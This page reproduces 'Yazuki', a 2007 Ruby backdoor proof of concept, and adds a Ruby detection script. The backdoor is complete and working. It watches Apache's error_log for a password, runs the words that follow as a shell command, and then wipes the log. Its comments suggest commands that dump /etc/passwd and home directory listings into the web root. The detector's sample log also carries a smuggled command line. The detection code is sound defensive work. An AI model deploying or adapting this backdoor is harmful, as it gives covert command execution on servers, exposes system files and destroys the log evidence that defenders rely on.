Xairro.com

Yazuki - Apache error_log backdoor

#!/usr/bin/env ruby
# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Contact: skyout[-at-]smash-the-stack[-dot-]net
# Website: http://www.smash-the-stack.net/
# Used Ruby version: 1.8.4
# Tested on: OpenBSD 4.1
# This proof-of-concept code shows a simple backdoor
# concept that does not need any open port to execute
# shell commands. Yazuki searches the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, which must consist of exactly
# five arguments (for more, just edit line 41).
# Possible commands: (Make sure to always have five arguments
# or edit line 41)
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt
# Start an indefinite loop
x = 0
while (x == 0)
   # Define the error_log file of Apache
   error_log = "/var/www/logs/error_log"
   # Open Apache's error_log file
   if (File.file?(error_log))
      if (File.readable?(error_log))
         File.open(error_log).each { |line|
            # Define the password
            if line =~ /ourpassword/
               # Make an array of the error_log line
               array = line.split(" ")
               # Take the 5 last arguments
               command = array.fetch(13) + " " + array.fetch(14) + " " +
                         array.fetch(15) + " " + array.fetch(16) + " " + array.fetch(17)
               # Execute the command
               IO.popen(command)
               # Truncate the error_log file again
               if (File.writable?(error_log))
                  File.truncate(error_log, 0)
               end
            end
         }
      end
   end
   # Wait 5 seconds
   sleep 5
end
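The header comments describe what a defender can look for: the backdoor needs a shell command to land in error_log (a request for a non-existent path that carries the command), and it wipes error_log after every run. The Ruby script below is an added detection example, not part of Yazuki or the original page. It flags error_log lines whose message contains shell syntax and reports the log file shrinking between two polls. It assumes the classic Apache 2.x error_log line shape "[time] [level] [client ip] message"; the log lines and the `ourpassword` request in SAMPLE_LOG are constructed for the example.

```ruby
#!/usr/bin/env ruby
# Added detection example; not part of Yazuki or the original page.
# Two checks against Apache's error_log:
#   1. flag lines whose requested path carries shell syntax
#      (what a log-reading backdoor waits for), and
#   2. notice the log shrinking between two polls, which truncating
#      error_log after each command causes.

require 'tempfile'

# Shell syntax that has no business in a requested filename.
SHELL_SYNTAX = /[;|&>`]|\$\(/

# Parse one Apache 2.x error_log line; returns nil when the line does not
# match the assumed "[time] [level] [client ip] message" shape.
def parse_error_line(line)
  m = line.chomp.match(/\A\[(?<time>[^\]]+)\] \[(?<level>[^\]]+)\] \[client (?<client>[^\]]+)\] (?<message>.*)\z/)
  return nil unless m
  { time: m[:time], level: m[:level], client: m[:client], message: m[:message].strip }
end

# True when the message part of the line looks like a smuggled command.
def suspicious_line?(line)
  fields = parse_error_line(line)
  return false unless fields
  !!(fields[:message] =~ SHELL_SYNTAX)
end

# Scan a whole log body; returns one finding per suspicious line.
def scan_error_log(text)
  findings = []
  text.each_line.with_index(1) do |line, n|
    next unless suspicious_line?(line)
    fields = parse_error_line(line)
    findings << { line_no: n, client: fields[:client], message: fields[:message] }
  end
  findings
end

# Remember the last seen size of the log; a size that drops between polls
# means it was truncated in place. Log rotation can also shrink the file
# seen at this path, so treat :shrunk as a lead to correlate, not as proof.
class LogShrinkWatch
  def initialize
    @last_size = nil
  end

  # Returns :shrunk, :grew or :unchanged for this poll.
  def poll(path)
    size = File.size(path)
    verdict = if @last_size.nil? || size == @last_size then :unchanged
              elsif size < @last_size then :shrunk
              else :grew
              end
    @last_size = size
    verdict
  end
end

# Constructed sample lines (not real log data); the second one is the kind
# of request a log-reading backdoor is waiting for.
SAMPLE_LOG = <<~LOG
  [Sat Oct 13 10:12:01 2007] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/favicon.ico
  [Sat Oct 13 10:12:05 2007] [error] [client 198.51.100.7] File does not exist: /var/www/htdocs/ourpassword ls -a /home > /var/www/htdocs/home.txt
  [Sat Oct 13 10:12:09 2007] [error] [client 192.0.2.10] File does not exist: /var/www/htdocs/robots.txt
LOG

if __FILE__ == $0
  scan_error_log(SAMPLE_LOG).each do |f|
    puts "line #{f[:line_no]} from #{f[:client]}: #{f[:message]}"
  end
end
```

Run `LogShrinkWatch#poll` from the same cron or monitoring loop that ships error_log elsewhere: a backdoor of this kind only works if error_log is writable by the web server's user, so shipping the log off-host before it can be truncated removes both the trigger channel's cover and the anti-forensic effect.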